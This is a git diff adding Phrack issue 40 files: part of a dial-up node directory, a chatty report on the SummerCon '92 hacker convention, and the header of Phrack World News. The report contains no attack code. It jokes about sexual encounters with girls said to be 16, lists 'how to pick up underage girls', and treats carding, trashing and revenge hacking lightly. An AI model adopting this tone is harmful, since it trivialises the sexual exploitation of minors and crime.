+13345 Springfield          OH  USA  LOW   B B  C     513/322-8855 Y
+13346 Kankakee/Bradley     IL  USA  LOW   B B  C     815/935-2352 Y
+13346 Bradley              IL  USA  LOW   B B  C     815/935-2352 Y
+13354 Chico                CA  USA  LOW   B B  C     916/343-4401 Y
+13357 Bryan                TX  USA  LOW   B B  C     409/823-1090 Y
+13364 Missoula             MT  USA  LOW   B B  C     406/542-0472 Y
+13365 Pascagoula           MS  USA  LOW   B B  C     601/769-0121 Y
+13430 Minot                ND  USA  LOW   B B  C     701/838-2140 Y
+13446 Red Bank             NJ  USA  LOW   B B  C     908/758-0337 Y
+13446 Eatontown/Red Bank   NJ  USA  LOW   B B  C     908/758-0337 Y
+13446 Long Branch/Red Bank NJ  USA  LOW   B B  C     908/758-0337 Y
+13450 Elmira               NY  USA  LOW   B B  C     607/737-9065 Y
+13451 Rome                     ITA  E2    B C  C     (6)8550340   Y
+13452 Turin                    ITA  E2    B C  C     (11)2480125  Y
+13524 Fayetteville         AR  USA  LOW   B B  C     501/442-0234 Y
+13524 Springdale/Fayettevl AR  USA  LOW   B B  C     501/442-0234 Y
+13535 Honolulu             HI  USA  MED        C     808/528-5300 Y
+13541 Colorado Springs     CO  USA  MED   B B  C     719/590-1003 Y
+13552 Bakersfield          CA  USA  LOW   B B  C     805/325-0371 Y
+13553 Harrisburg/Lemoyne   PA  USA  MED   B B  C     717/975-9881 Y
+13553 Lemoyne              PA  USA  MED   B B  C     717/975-9881 Y
+13554 Richland             WA  USA  MED   B B  C     509/375-3367 Y
+13557 Port Arthur          TX  USA  LOW   B B  C     409/721-3400 Y
+13557 Nederland/Pt. Arthur TX  USA  LOW   B B  C     409/721-3400 Y
+13572 Springfield          MO  USA  LOW   B B  C     417/881-6225 Y
+13573 Austin               TX  USA  HIGH  B B  C     512/448-1096 Y
+13576 Fresno               CA  USA  LOW   B B  C     209/442-4328 Y
+13577 Shreveport           LA  USA  LOW   B B  C     318/688-5840 Y
+13601 Birmingham           AL  USA  HIGH  B B  C     205/942-7898 Y
+13602 Birmingham           AL  USA  HIGH  B B  C     205/942-7898 Y
+13603 Louisville           KY  USA  MED   B B  C     502/499-9825 Y
+13614 Long Beach           CA  USA  MED   B B  C     310/436-6033 Y
+13614 Norwalk/Long Beach   CA  USA  MED   B B  C     310/436-6033 Y
+13614 San Pedro/Long Beach CA  USA  MED   B B  C     310/436-6033 Y
+13616 Little Rock          AR  USA  MED   B B  C     501/666-6886 Y
+13617 Philadelphia         PA  USA  HIGH  B B  C     215/592-8750 Y
+13620 Mobile               AL  USA  MED   B B  C     205/460-2515 Y
+13623 Akron                OH  USA  MED   B B  C     216/376-8330 Y
+13624 Toledo               OH  USA  MED   B B  C     419/255-7705 Y
+13626 Memphis              TN  USA  MED   B B  C     901/527-8122 Y
+13641 Burton               MI  USA  LOW   B B  C     313/743-8350 Y
+13643 Madrid                   ESP  E2    C C  C     (1) 7661900  Y
+13645 Lansing              MI  USA  MED   B B  C     517/484-5344 Y
+13646 Fort Worth           TX  USA  MED   B B  C     817/332-9397 Y
+13646 Alington/Fort Worth  TX  USA  MED   B B  C     817/332-9397 Y
+13650 Columbia             SC  USA  MED   B B  C     803/254-7563 Y
+13651 Columbia             SC  USA  MED   B B  C     803/254-7563 Y
+13653 Ft. Wayne            IN  USA  LOW   B B  C     219/422-2581 Y
+13655 Huntsville           AL  USA  MED   B B  C     205/882-1519 Y
+
+* Node 4003 is listed for many different countries.  It represents the
+  Enhanced Global Connection Service which includes nodes:
+  2576, 3512, 3513, and 4003.
+
+B=BELL 103/113 (300 bps) or BELL 212A (1200 bps) compatable modems
+
+C=CCITT V.21(300 bps) or CCITT V.22 bis(2400 bps) or CCITT V.32 compatible
+  modems
diff --git a/phrack40/11.txt b/phrack40/11.txt
new file mode 100644
index 0000000..052d4e4
--- /dev/null
+++ b/phrack40/11.txt
@@ -0,0 +1,656 @@
+                                ==Phrack Inc.==
+
+                    Volume Four, Issue Forty, File 11 of 14
+
+    _______                                        ________
+    \  ___ \                                      /  _____ \             /|
+     \ \  \|                         _____        | /     |/  _____     | |
+      \ \   |\   /| |\_  _/||\_  _/|| _ _/ |\___  | |        /  _  \ |\ | |
+   |\__\ \  | |_| | |  \/  ||  \/  || _|_  |  __\ | \_____|\ | |_| | |  \ |
+   \______\ |_____| |_|\/|_||_|\/|_||____\ |_|    \________/ \_____/ |_|\_|
+
+                           1       9       9       2
+_______________________________________________________________________________
+   _________________________________________________________________________
+
+                   "Told ya...Should a killed me last year!"
+
+                          by Knight Lightning & Dispater
+
+       Special Thanks: Dr. Williams, Holistic Hacker, Nihil, and The Pope
+    _ _ _ _ _ _ _ _ _ _ _ __ ___ ____________ ___ __ _ _ _ _ _ _ _ _ _ _ _ _
+
+
+                                 SummerCon '92
+                                June 26-28, 1992
+                         Executive International Hotel
+
+    "SummerCon... What is it?  In many ways, SummerCon is much more than
+     just a convention that attracts America's greatest phreaking and
+     hacking personalities.  SummerCon is a state of mind.
+
+     Hackers by nature are urged on by a hidden sense of adventure to
+     explore the unknown, to challenge the unchallenged, to reach out and
+     experiment with anything and everything.  The realization that we are
+     not alone in our quest sometimes comes as a great gift and the
+     opportunity to meet one's heroes, partners, and idols can be the most
+     awe-inspiring aspect of the hacker community -- this is what SummerCon
+     is all about.
+
+     On the surface, SummerCon looks like a handful of youths hanging out at
+     a hotel in St. Louis, Missouri.  To me, it is more like one of those
+     madcap movies you see on late night Home Box Office or something.  No
+     real point or direction, rebels without cause, all in the name of
+     frantic fun and games.  The atmosphere surrounding SummerCon is that of
+     a dream world where once a year you can escape to a fantasy where
+     ingenuity is king and you have friends around you at every moment.
+     SummerCon itself may only last a weekend, but the friendships last a
+     lifetime."
+
+          -- Knight Lightning, Phrack 28, File 8 (PWN Special on SummerCon '89)
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+SummerCon!  At last, a return to the original idea behind the event.  It was
+great!  It was crazy!  It was a party!  It was everything it should have been
+and more.
+
+When Taran King, Forest Ranger, and Knight Lightning first conceived the idea
+of SummerCon in late 1986, they probably never imagined that they would all
+three still be involved six years later or just how popular their high-school
+dream would become.
+
+It seemed as though nothing could top SummerCon '89.  It was a great turnout
+of 23 people, there was a serious conference, there was also sorts of mischief
+and mayhem, and all in all, everyone had a great time.  In 1990, SummerCon
+coincidentally took place on the same weekend on which the United States
+government dropped charges on Knight Lightning.  The turnout was less than ten
+people and the conference was anything, but a success.
+
+In 1991, SummerCon tried something new.  The theme that year was CyberView and
+it had a special focus on civil liberties issues.  The turnout was average,
+but something was missing.  Finally, in 1992, the spirit of SummerCon was
+reborn anew.
+
+
+ Setting Up For SummerCon '92
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Setting up SummerCon this year was a tricky situation.  Knight Lightning had
+moved to Washington, D.C., Dispater didn't live in St. Louis, Taran King was
+working full time, and Forest Ranger was nowhere to be found.  Luckily, there
+was Rambone.  With help from Taran King, Rambone set forth to make sure that
+the hotel accommodations and the conference room arrangements were taken care
+of and without his help, SummerCon might possibly not have happened.
+
+All sorts of other arrangements had to be made as well.  We wanted this year's
+conference to be very special and so for the first time ever, we decided to
+embark on the risky enterprise of designing and selling Phrack/SummerCon
+t-shirts.  Knight Lightning and Dispater worked together on the design work
+and Dispater took care of the art and manufacturing.  For those who haven't
+seen or heard about these shirts before, a brief description is in order.
+_______________________________________________________________________________
+
+ Phrack/SummerCon '92 T-Shirts
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+There were only a very limited number of shirts made for the conference and
+they were sold out.  A re-order was issued, mostly for people who attended the
+conference (but didn't get a shirt because of the small supply).  A few shirts
+were reserved for people that were unable to attend.  Unlike the Legion of
+Doom, Internet World Tour shirts, Phrack has no plans at this time to sell
+shirts to the general public.  If there is a change in policy, we will let the
+readers know immediately.
+
+The shirts are standard white, short-sleeved t-shirts with no pockets.
+
+Front:  On the left breast there is a picture resembling Oliver Wendall Jones
+        (the computer hacker from the comic strip Bloom County).  He is
+        swinging his sword while standing at ground zero inside the cross hairs
+        of a rifle.  Circling above him are the words, "SummerCon '92" and
+        below him, "June 26-28 St. Louis, MO."
+
+Back:                                PHRACK
+                                M a g a z i n e
+                                 _____________
+                              ___________________
+                                 _____________
+
+                              When You Care Enough
+                            To Indict The Very Best
+
+                        PHRACK: 1     Secret Service: 0
+
+                                 911's A JOKE!
+
+                           The information contained
+                         herein should not be disclosed
+                        to unauthorized persons.  It is
+                       meant solely for use by authorized
+                     employees of the BELLSOUTH Corporation
+                          or any of its subsidiaries.
+_______________________________________________________________________________
+
+ Executive International Hotel... Not A Best Western Anymore?
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+All parties concerned decided that we should return to the site where our best
+conferences had been held, the Executive International Best Western Hotel, but
+we had a surprise waiting for us when we arrived for the conference.  It turned
+out that the Executive International was no longer a Best Western, in fact
+they had gone bankrupt.  To make matters worse, the bank that foreclosed on the
+property failed as well -- in other words, the Executive International was now
+owned by the United States Government!
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+ SummerCon Begins
+ ~~~~~~~~~~~~~~~~
+There was so much going on and there were so many people at the conference,
+that there is no possible way to give a play-by-play of events at SummerCon.
+
+Knight Lightning arrived the Thursday before and Dispater flew in in the wee
+hours of the morning on Friday.  When KL arrived with TK at the hotel around
+1 PM, the conference was already in full swing with groups of guys from Texas
+and Boston congregated outside the hotel wearing Phrack t-shirts and already
+trading war stories.  Perhaps the biggest surprise was the arrival of Doc
+Holiday, who no one had been able to contact to invite -- of course the
+surprise was more on Erik Bloodaxe than anyone else.
+
+More and more people arrived during the day, and as they did, a strange
+sensation was shared among the alumni from SummerCon's past.  True, Tuc and
+Lex Luthor weren't here, but outside of that, this was already looking like a
+reunion of all the people from all the SummerCons that had been before.
+
+Lucifer 666 was running around with Control C, The Disk Jockey was seen
+cruising the downtown bar scene with Forest Ranger and Tom Brokaw, Erik
+Bloodaxe and Doc Holiday called some of the girls they had met from the
+previous year's convention.  Everything was happening so fast, it was hard to
+keep track of, so we didn't try.  We just had fun.
+
+About 1/3 of the people at SummerCon went to see "Batman Returns."  In light of
+the trip at the SummerCon of 1989, it seemed like a good idea.  Others hung out
+poolside, roaming the hotel and its adjoining office complex, and still others
+raided the free buffet at the Radison Hotel down the street.
+
+The Washington, D.C. contingent of SummerCon guests were content to sit in
+their room most the evening and explore Internet sites in the St. Louis area.
+Some went trashing, some hit the bars looking for women, and some sat in the
+room occupied by Restricted Data Transmissions (RDT) for some good information
+exchange.
+
+Meanwhile, an underage hacker named Pyro (gee that's an original name) was the
+first to meet the pride and joy of Springfield, Illinois.  Both of these young
+women claimed to be age 16 and Pyro was the first to experience some of their
+womanhood.  One of "girls" was named Dena and she was in the mood for some
+action as well.  Clawing at almost every guy at the hotel, she refused to
+leave.  She finally disappeared into a room and was not heard from again until
+the next morning.
+_______________________________________________________________________________
+
+ SummerCon: The Conference
+ ~~~~~~~~~~~~~~~~~~~~~~~~~
+The previous evening's activates had taken their toll.  When 12 noon came
+around, most of the hackers weren't even awake yet, let alone prepared for the
+conference session.  The meeting was re-scheduled to 1 PM, but in the meantime
+Knight Lightning passed out copies of Security Insider Report (from Interpact),
+information about InterTek, a ComputerWorld article by Chris 'Erik Bloodaxe'
+Goggans (this article also appears in PWN 40/1), while Mr. Icom did the same
+with back issues of Cybertek.  Emmanuel Goldstein was busy selling the new
+black 2600 t-shirts and passing out back issues of 2600 Magazine.  Copies of a
+recent article about hackers doing computer security from the Boston Business
+Journal were also to be found compliments of RDT.  RDT was also responsible for
+making this year's SummerCon buttons.  Holistic Hacker made some as well.
+Thanks to all parties concerned for your great work and efforts.
+
+Although it wasn't exactly made available for everyone to take a close look at,
+Knight Lightning proudly showed off his pre-release copy of THE HACKER
+CRACKDOWN by Bruce Sterling.  This book, which will be available in hardback to
+the public on October 15, 1992, looks to be one of the most popular literary
+works on the world of hackers ever.  It focuses on the raids in the Atlanta-LOD
+/Phrack/E911 case and Operation Sun Devil.  It is believed that Knight
+Lightning himself appears on the cover of the book.
+
+With the gavel-like banging of a lineman test set, Knight Lightning formally
+called the meeting to order at about 1:15 PM.  He expressed his appreciation
+for the massive attendance (there were at least 60 people actually at the
+SummerCon meeting).  Rambone made a quick note about the activities of the
+previous night as laughter and jokes about the "cyber-nymphs" erupted from all
+around the room.
+
+Dispater took the floor for a moment to welcome everyone as well and then
+expressed his gratitude to the members of RDT for all of their help in
+producing Phrack issues during the past year.  A discussion about who owned the
+hotel began briefly and then the first conference speaker was called to the
+floor.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+1. The Gatsby
+
+"I'm sure you're all familiar by now with the media stories of the '1000-member
+ring of hackers' that supposedly have been invading the credit bureaus of CBI/
+Equifax, but the story isn't true and there is a lot more going on."
+
+Gatsby explained that a hacker named The Prisoner (aka Multiplexor) from
+Indianapolis (and apparently also to some extent from Long Island) flew to San
+Diego to see a girl, supposedly on a carded ticket.
+
+While in San Diego, he allegedly broke into computers at Zale's Jewlery store
+and pulled credit card info from their point-of-sales system.  After he vacated
+the rented room he had been staying in, he foolishly left behind the credit
+card printouts and his former landlord (whom he owed money to) discovered them
+and called the San Diego Police Department.
+
+Sometime later, Multiplexor was met at his new accommodations at the Sleepy
+Time Motel in San Diego by the police.  The FBI was brought into the case and
+he was kept at the Marriott Hotel for two weeks, all expenses paid!  While
+under government supervision, Multiplexor logged into several systems,
+including Scantronics BBS.
+
+During the course of the investigation, a hacker known as The Crypt Keeper came
+forward to tell what he knew about the hacker underground.  He eventually
+would give the police access to Scantronics BBS logs he had in his possession
+after using The Gatsby's password to login to the system.
+
+These logs were used by the police to gain search warrants for Scantronics BBS
+and its now unhappy former sysop, Kludge.
+
+[The full details, police reports, warrants, and an interview with The Crypt
+keeper appears in Phrack World News 40/1.]
+
+
+2. Agent Steal
+
+Agent Steal gave a very informative talk about his dealings with Kevin Poulson,
+know to some as Dark Dante.  AS related some of the experiences and adventures
+that the two of them had been through several years ago and talked about how
+Kevin used to break into central offices on a daily bases.  Poulsen even had
+special equipment set up in his apartment to prevent him from being traced.
+Poulsen of course was the subject of a federal indictment and appeared on an
+episode of Unsolved Mysteries.  He has since been taken into custody and is
+awaiting trial.
+
+Agent Steal himself had spent a short time in prison on some bogus charges that
+were brought against him to elicit his help in prosecuting Poulsen.  He refused
+to assist, but he eventually was released anyway.  He said that he was looking
+forward to something different now, but he may have been referring to the Ozzy
+Osbourne concert later that night in St. Louis.  Agent Steal is working on a
+book about his adventures with Poulsen called "Data Thief" and he expects it to
+be published in the near future.
+
+
+3. Emmanuel Goldstein, 2600 Magazine, Editor
+
+"Many people mistrust the government and big business, and they want to know
+how to fight back."
+
+Emmanuel Goldstein spoke about the First Amendment and why 2600 Magazine has
+been able to exist and grow over the years despite the events that haunted
+Phrack in 1990.  During 2600's eight years in existence, the magazine has never
+once been directly harassed by the government.  The main reason he believes
+that Phrack was hit and 2600 left alone is because 2600 is a printed (hardcopy)
+publication.
+
+However, 2600 is in need of good writers and will print anything, leaked or
+sent to them, it doesn't matter.  2600 has never been sued, although they are
+often threatened with legal action [See PWN 40/3 for the latest threats against
+2600 from Bellcore].  2600 has a subscription list of 1500 and a newstand
+of 3000.
+
+He also spoke about some of their press releases that were issued in order to
+alert people about insecure systems, but that the information is never acted
+upon until something happens.  People always like to blame the magazine for
+giving the details on how to do something (such as opening Fed Ex drop boxes),
+but never take action to correct the problems the magazine exposes.
+
+A few people had questions for Emmanuel.  For example, he was asked, "How do
+you morally justify hacking and the type of information published in 2600?"  He
+responded by pointing out that 2600 only prints information about security
+flaws which need to be addressed and fixed.
+
+Emmanuel was also asked if there was any fallout from the Simplex lock hacking
+article which described how to hack Simplex locks with out any tools and in
+less than 20 minutes (often less than 3 minutes).  Given that Simplex locks are
+widely used at universities and Federal Express drop boxes, one would expect
+some sort of action.  Emmanuel replied that he was surprised that there hadn't
+been much of a response or any action taken against 2600 because of the
+article.  However, based on what many readers have told him, it seems that
+nobody has even changed the default combinations!
+
+4. Control C [Legion of Doom]
+
+Control C has been a hacker surrounded by a lot of controversy over the years,
+from his days with the Legion of Doom through his employment and termination
+from Michigan Bell security.
+
+He addressed the circumstances that led to his finding work with Michigan Bell.
+In 1987, Control C had started to log into Michigan Bell computers almost on a
+daily basis for the purpose of becoming better acquainted with C programming.
+During one 4 hour session, Michigan Bell Security traced his call back to
+Chicago (where he had been in school at the time).  The next day, ^C had moved
+back to Detroit and he received a call from some gentlemen who wanted to invite
+him to lunch.
+
+When he showed up, he was greeted by Michigan Bell Security personnel and the
+country sheriff's department.  The result was a job where his main
+responsibility was to find flaws in their computer security by any means
+necessary.  Over the years, Control C found well over 100 different holes and
+other weaknesses in their systems.
+
+As time went on and key people left and were replaced by staff with more
+conservative attitudes, a new vice president (and former police officer) came
+in and decided it was no longer fashionable to employ a hacker.  Control C was
+informed that he must leave despite the need for his services.
+
+Shortly after Control C agreed to depart, the Secret Service became involved.
+They wanted to bring charges on ^C for the original break-ins at Michigan Bell
+that led to his employment.  It didn't matter that Michigan Bell had signed
+documents that they would not bring charges.  It didn't prevent the Secret
+Service from coming after him in 1990 (right during the same time as the E911
+Phrack case and LOD-Atlanta cases began).
+
+Control C was requested to take a polygraph.  However, the timing was not good
+and ^C's lawyer request a new time.  Now more than a year and a half since the
+request was made, ^C has not heard back from the Secret Service.  Today ^C has
+moved on to a new vocation.
+
+
+5. Signal Surfer
+
+Signal Surfer voiced his concerns about the bad reputation hackers have in the
+computer industry when in reality, most people in the industry are hackers in
+the first place.  He expressed an interest in trying to get people together to
+work on changing the stereotype of the modern hacker and helping hackers find
+legitimate jobs in the computer field.
+
+
+6. Predat0r, TAP Magazine, Editor; Blitzkrieg BBS, Sysop
+
+Predat0r gave a short update on the current status of TAP and tried to explain
+why he hadn't produced an issue in over a year.  Legal problems (something
+about being accused of stealing a laptop computer) that were taking up his time
+and resources were at fault.  However, he says that those issues have been
+resolved and that TAP will start publishing again with issue #106 sometime this
+fall.
+
+He gave his promise that he would not just fold the magazine and rip everyone
+off who had sent him money.
+
+
+7. Mr. Icom, Cybertek, Editor
+
+Similar to Predat0r, Mr. Icom expressed his apologies for having been somewhat
+delinquent in getting new issues of his magazine out.  He claimed that issue #7
+would be released in the near future. 
+
+
+8. Erik Bloodaxe (Chris Goggans)[Legion of Doom][Comsec Data Security, Inc.]
+
+It was only a year ago at SummerCon '91 that Erik Bloodaxe, Doc Holiday, and
+Malefactor proudly announced the formation of Comsec.  Now, the following year,
+it seemed that events had come full circle.  What had happened to Comsec?  Why
+did it go out of business?  What is the deal?  That's what everyone wanted to
+know and what Goggans was prepared to discuss.
+
+One of the factors that contributed to the failure of Comsec was operating
+costs associated with creating the company in the first place.  Unfulfilled
+promises of investment in the company from people like Kenyon "Malefactor"
+Shulman and a whisper campaign against them by others in the computer security
+industry and a criminally negligent press hurt them badly, so much in fact they
+could not recover.
+
+Goggans continued his tale of corruption and unfair play in the security
+community.  For example, there was an agreement between Goggans and ISPNews
+about Goggans writing a regular column in their bi-monthly publication.
+However, after he submitted his first article, the newly formed editorial board
+decided against allowing it to be published.  They said it was common for the
+editorial board to not allow sensitive articles in their magazine.  But when
+ISPNews was asked what other contributors had their articles reviewed like
+this, they could produce no names.  It should also be pointed out that among
+the members of the editorial board is one William J. Cook, formally an
+assistant United States Attorney in Chicago -- the same prosecutor who is
+responsible for the cases against Phrack co-founder Craig Neidorf (Knight
+Lightning), Shadow Hawk, Steve Jackson Games, Len Rose, The Mentor, and Chris
+Goggans himself!
+
+But it didn't end there!  Someone on the editorial advisory board (without
+permission from Goggans) forwarded his article to the head of security for
+SprintNet.  Goggans received a threatening letter from SprintNet that called
+his article potentially libelous and claimed that it contained inaccuracies
+and proprietary company information.
+
+But waitasec if the article contains confidential information then how could it
+be innaccurate?  And if it's inaccurate then how could it divulge useful
+security flaws in their security?
+
+Most recently, Goggans wrote an article for ComputerWorld (see PWN 40/1) about
+hackers and computer security.  It addresses Tymnet and Telenet security
+issues.  He discussed how hackers exploit these networks and how they can be
+stopped.  He read the article aloud in full.  It was typical of most security
+articles -- detailed, technically rounded, and somewhat dry.  There were no big
+security revelations or tips.
+
+He then went on to read some of the editorial replies of people responding to
+his article in subsequent issues of ComputerWorld.  The audience did not
+approve of their negative response.
+
+Finally, the discussion turned to the situation with MOD.  Goggans talked about
+the persistent harassment he had been subjected to by Phiber Optik and other
+members of his alleged New York based organization.
+
+Goggans said that in addition to the usual childish prank calls he would often
+receive, MOD obtained his credit information including his credit card numbers
+and posted them on bulletin boards and IRC.  They were also responsible for
+changing his residential home telephone long distance service from U.S. Sprint
+to AT&T so they could more easily obtain his long distance calling records.
+
+He was not alone -- other partners at Comsec and Doc Holiday's (Scott Chasin)
+mother were also harassed.  Harassing a hacker is one thing, but going after a
+man's family and livelihood is clearly stepping beyond the bounds of a hacker's
+code of ethics.  Something had to be done aboutthe problem, so Comsec decided
+to end MOD's reign of criminal obnoxiousness by any means necessary.
+
+There was a debate as to the proper way to handle this situation.  Goggans
+revealed that he eventually turned to the FBI for assistance, who were
+surprising helpful.  Some people at SummerCon were critical of his admission.
+
+Emmanuel Goldstein was the most outspoken of those who responded.  "If we start
+resorting to asking the FBI to resolve our problems, then that is a worse
+violation than what MOD did to you.  The more appropriate response would be to
+use the same tricks to get back at them."
+
+Emmanuel also gave an example of what he meant.  One day, his office starting
+receiving lots of calls from people who wanted trips to Europe.  It turned out
+that an answering machine at a travel agency had been left with an outgoing
+message that told callers to contact both John Maxfield and Emmanuel Goldstein
+and gave out both their numbers.  Maxfield solved the problem by called the
+feds... 2600 hacked the answering machine and changed the message to something
+more innocuous.
+
+However clever Emmanuel's ideas might be, Goggans stated that, "legitimate
+business people cannot resort to illegal means to correct such a situation.  We
+had no other alternatives."
+
+The debate continued for 30 minutes until, eventually, Knight Lightning stepped
+in, pointed out that this discussion could go on forever, and that it was time
+to start closing up shop.
+
+
+9. DrunkFux, HoHoCon, Director
+
+Before the meeting was officially concluded, dFx had a few things to discuss
+concerning how the guests had been conducting themselves in the hotel and he
+wanted to relate an experience he had at HoHoCon '91.
+
+"The rowdiness at HoHoCon made last night at SummerCon look like a daycamp."
+
+Drunkfux explained that the managers at the hotel for HoHoCon blamed the
+conferences guests for all sorts of damage, and threatened to hold dFx
+financially responsible.  The manager even threatened to bill his credit card
+for the damage.  dFx responded by calling his credit card company and they
+informed him that what the hotel had threatened to do was illegal and they
+would be more than happy to prosecute the Hilton Hotel if they attempted to
+bill dFx for such charges.
+
+The Hilton staff claimed that some conference guests set fire to part of a
+hallway, but refused to show dFx the damage when asked.  dFx's attorney (a
+relative who had gotten involved at this point) asked if any fire alarms had
+gone off.  The reply was no.  The attorney then informed the Hilton staff that
+he would be happy to sue them on behalf of the conference guests for
+endangering their lives by placing them in accommodations with defective fire
+alarms.  The Hilton staff changed their story.
+
+Another claim against the HoHo'ers was that they had engaged in and allowed
+underage drinking.  The attorney pointed out that the hotel's own bartenders
+were responsible for serving many of them and if Hilton's claim was true, he
+would be forced to call the state and have the hotel's liquor license revoked.
+The Hilton staff changed their story.
+
+This sequence of point/counter-point repeated itself a few times until all
+claims were dropped.
+
+A few days later, the two hotel managers who had previously accused dFx of
+damage went to his house to personally apologize.  They gave him coupons for
+free nights the next time he stays at one of their hotels.  dFx recorded the
+meeting on videotape and he joked around about putting the scene into gifs and
+distributing it to a BBS near you!
+_______________________________________________________________________________
+
+ Afterwards
+ ~~~~~~~~~~
+After the official meeting, many guests left the hotel to eat, trash, and
+explore the city.  Frosty and some of the other GCMS-MechWarriors started a
+game of Hacker (Steve Jackson Games) in the conference room.  Many people soon
+wandered over to Northwest Plaza Mall; where the trouble began.
+
+
+ Rule #4
+ ~~~~~~~
+About 10 or more people (including Emmanuel Goldstein, The Conflict, Erik
+Bloodaxe, Doc Holiday, and Signal Surfer) had entered the Northwest Plaza mall
+and a couple of them had baseball caps on... backwards.
+
+A few minutes later, they were approached by mall security who told them that
+wearing their hats backwards was a violation of Rule #4 and was not allowed.
+Specifically the security guard said, "All clothing must be worn in the way it
+was meant to be worn."  Go figure, aren't hats supposed to be worn on your
+head?  This was more than Emmanuel and the others would take.  They marched
+right into Sears and Emmanuel bought everyone (who didn't already have a hat) a
+bright red St. Louis Cardinals baseball cap.
+
+Now all of them had their hats on backwards and they started strolling around
+the mall soon catching the eye of another always-alert rent-a-cop, mall
+security guard.  After telling them to turn their hats around (and dropping his
+walkie-talkie in his attempt to call for backup), the security guard was
+approached by Emmanuel who wanted to discuss this Rule #4.
+
+Another guard mumbled something about how a case on the matter had already gone
+to the appellate court, but he neglected to mention the outcome and we have
+been unable to find any details about case.
+
+The security guards (now in full force) told Emmanuel this policy was in fact
+posted at all entrances and then they threw everyone out of the mall.  Emmanuel
+says that he circled the mall noting that the rule was actually only posted at
+2 of the 12 entrances.  Another interesting rule was #6, which made it illegal
+to have a cellular phone, beeper, or any other device capable of making sounds
+in the mall.  Erik Bloodaxe had broken this rule when he had played "Mary Had A
+Little Lamb" on Signal Surfers cellular phone.
+
+
+ Nightfall
+ ~~~~~~~~~
+Towards the late afternoon about half of the Con ventured to the St. Louis
+waterfront on the Mississippi (Laclede's Landing) where the riverboats, bars
+and the Arch is found.
+
+Holistic Hacker showed videos in his room including:
+
+"ESS Phun"                         - A humorous raid of a Bell Central Office
+                                     by three hackers.
+"Unsolved Mysteries"               - The Kevin Poulsen episode.
+"Rudolph the Heavy-Metal Reindeer" - No explanation.
+"Good Morning America"             - See Doc Holiday EAT his own hand!
+"Now It Can Be Told"               - Phiber Optik, Emmanuel Goldstein, and
+                                     Knight Lightning on Geraldo.
+"SummerCon '89"                    - Highlights of SummerCon '89.
+"SummerCon '91"                    - Highlights of SummerCon '91.
+
+Later in the evening, things just went out of control.  Smoke bombs were going
+off, power outages were occurring, rooms were filling up with trash found in
+dumpsters at major computer and telecommunications office buildings.  Dena was
+back stalking new prey (and found it).
+
+Agent Steal and DrunkFux went to the Ozzy Osbourne concert while Erik Bloodaxe
+and Doc Holiday went out with the girls from last year's conference.  They
+didn't make it back to the hotel until the next morning <wink wink>.
+
+Security guards were running around threatening to send people to jail for no
+specific reason other than being disruptive.
+
+The only serious discussions that night took place in the RDT room.
+_______________________________________________________________________________
+
+ Sunday
+ ~~~~~~
+The guests slowly began waking up just before mandatory checkout time from the
+hotel.  As they gathered in the lobby and outside for last minute discussions
+and group photos, the group began to slowly dwindle in size.  A few had to catch
+flights right away, a few would be staying until Monday morning, but everyone
+promised to return next year.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+           PWN ^*^ PWN ^*^ PWN { SummerCon '92 } PWN ^*^ PWN ^*^ PWN
+           PWN ^*^ PWN ^*^ PWN {  Guest List!  } PWN ^*^ PWN ^*^ PWN
+
+     Agent Steal                 Erik Bloodaxe             The Not
+     Albatross                   Father Crime              Omega
+     Apollo Phoebus              Forest Ranger             OPii
+     Aragorn                     Frosty                    Phaedrus
+     Black Phoenix               Gateway                   Phantom Phreaker
+     Brian Oblivion              The Gatsby                The Pope
+     Bucky                       Golgo 13                  Predat0r
+     The Butler                  Holistic Hacker           The Public
+     Coder Decoder               Hunter                    Pyro
+     Colin                       Junkmaster                Rambone
+     The Conflict                Just Dave                 Sarlo
+     Control C                   Knight Lightning          Scooter
+     Count Zero                  Krynn                     The Serpent
+     Cray-Z Phreaker             Lord MacDuff              Signal Surfer
+     Crimson Death               Louis Cypher              Slack Master
+     Dark Angel                  Lucifer 666               Slave Driver
+     Dark Creaper                Magic Man                 Taran King
+     Disk Jockey                 Minor Threat              Tom Brokaw
+     Dispater                    Mr. Icom                  Video Vance
+     Doc Holiday                 Mucho Maas                Voyager
+     Dr. Cypher                  Mudge                     Weapons
+     Dr. Williams                Nat X                     White Knight
+     Drab Jester                 Night Ranger              Wind Runner
+     Drunkfux                    Nihil
+     Emmanuel Goldstein          Norris
+
+A total of 73 people and they are what made it worth remembering!
+_______________________________________________________________________________
+
+ A Few Things We Learned At SummerCon
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ By The Pope and Nihil
+
+- Don't try to buy beer at stores that have gas pumps.
+- How correctly wear a baseball hat.
+- "Playing" cellular phones is illegal.
+- All mall security officers are imported from Mississippi.
+- The showers at the Executive Internation only have two temperatures:
+  freeze and scald.
+- Frosty bought a lifetime supply knee-high tube socks before they went out of
+  style in the 1970's.
+- How to pick up underage girls.
+- Control C should have chosen the alias "No Control C."
+- After being awake for 43 hours (and drinking for 30), OPii's accent
+  disappears.
+- Hanging out with Crimson Death and Phantom Phreaker means worrying about
+  being drug tested at work Monday morning.
+- Hanging out with Crimson Death, Phantom Phreaker, and Erik Bloodaxe will
+  teach you how to defeat Moday morning's drug test.
+- Erik Bloodaxe and The Pope are the Siskel and Ebert of pornographic films.
+- Agent Steal has big hair.
+- Taran King has perfect hair.
+- DO NOT get into a car with Voyager and The Public.
diff --git a/phrack40/12.txt b/phrack40/12.txt
new file mode 100644
index 0000000..c8ec872
--- /dev/null
+++ b/phrack40/12.txt
@@ -0,0 +1,934 @@
+                                ==Phrack Inc.==
+
+                    Volume Four, Issue Forty, File 12 of 14
+
+              PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+              PWN                                             PWN
+              PWN              Phrack World News              PWN
+              PWN                                             PWN
+              PWN           Issue 40 / Part 1 of 3            PWN
+              PWN                                             PWN
+              PWN        Compiled by Datastream Cowboy        PWN
+              PWN                                             PWN
